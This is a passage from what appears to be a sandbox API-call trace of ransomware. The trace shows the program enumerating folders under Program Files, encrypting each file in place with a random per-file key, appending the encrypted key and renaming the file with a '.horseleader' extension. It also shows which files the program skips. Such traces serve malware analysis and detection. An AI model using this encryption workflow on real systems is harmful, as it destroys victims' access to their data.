(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.931] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.931] CloseHandle (hObject=0x158) returned 1 [0246.931] GetProcessHeap () returned 0x780000 [0246.931] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.931] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EDGE", cAlternateFileName="")) returned 1 [0246.932] lstrcmpiW (lpString1="EDGE", lpString2="Windows") returned -1 [0246.932] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned 64 [0246.932] lstrcmpW (lpString1="EDGE", lpString2=".") returned 1 [0246.932] lstrcmpW (lpString1="EDGE", lpString2="..") returned 1 [0246.932] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.932] GetProcessHeap () returned 0x780000 [0246.932] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.932] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*") returned 66 [0246.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.956] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.956] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\.") returned 66 [0246.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.956] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.956] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.956] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\..") returned 67 [0246.956] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.956] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.956] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb06ab00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfb06ab00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb8f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EDGE.ELM", cAlternateFileName="")) returned 1 [0246.957] lstrcmpiW (lpString1="EDGE.ELM", lpString2="Windows") returned -1 [0246.957] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0246.957] StrStrIW (lpFirst="EDGE.ELM", lpSrch=".horseleader") returned 0x0 [0246.957] lstrcmpW (lpString1="EDGE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.957] lstrcmpW (lpString1="EDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.957] lstrlenW (lpString=".testttjffg") returned 11 [0246.957] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.957] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.957] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.958] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0246.958] StrStrW (lpFirst="EDGE.ELM", lpSrch=".txt") returned 0x0 [0246.958] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47352) returned 1 [0246.958] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.962] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.962] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.962] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.963] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.963] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x18f8, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.963] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x18f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x18f8, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.964] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.964] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.964] CloseHandle (hObject=0x1a4) returned 1 [0246.964] GetProcessHeap () returned 0x780000 [0246.964] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.964] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM.horseleader") returned 85 [0246.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm.horseleader")) returned 1 [0246.966] GetProcessHeap () returned 0x780000 [0246.966] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.966] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EDGE.INF", cAlternateFileName="")) returned 1 [0246.966] lstrcmpiW (lpString1="EDGE.INF", lpString2="Windows") returned -1 [0246.966] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0246.966] StrStrIW (lpFirst="EDGE.INF", lpSrch=".horseleader") returned 0x0 [0246.966] lstrcmpW (lpString1="EDGE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.966] lstrcmpW (lpString1="EDGE.INF", lpString2="_uninstalling_.png") returned 1 [0246.966] lstrlenW (lpString=".testttjffg") returned 11 [0246.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF", lpSrch=".testttjffg") returned 0x0 [0246.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0246.967] StrStrW (lpFirst="EDGE.INF", lpSrch=".txt") returned 0x0 [0246.967] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=529) returned 1 [0246.967] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.970] CloseHandle (hObject=0x1a4) returned 1 [0246.970] GetProcessHeap () returned 0x780000 [0246.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.970] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF.horseleader") returned 85 [0246.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf.horseleader")) returned 1 [0246.973] GetProcessHeap () returned 0x780000 [0246.973] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.974] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.974] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0246.974] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.974] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.974] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.974] lstrlenW (lpString=".testttjffg") returned 11 [0246.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.975] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0246.975] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.975] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1347) returned 1 [0246.975] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.978] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.979] CloseHandle (hObject=0x1a4) returned 1 [0246.979] GetProcessHeap () returned 0x780000 [0246.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.979] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.horseleader") returned 88 [0246.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.horseleader")) returned 1 [0246.980] GetProcessHeap () returned 0x780000 [0246.980] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.980] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6722, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.980] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.980] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0246.980] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.980] lstrlenW (lpString=".testttjffg") returned 11 [0246.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0246.981] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.981] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=26402) returned 1 [0246.981] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.984] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.984] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.985] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1722, lpOverlapped=0x0) returned 1 [0246.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe8de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1722, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1722, lpOverlapped=0x0) returned 1 [0246.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, 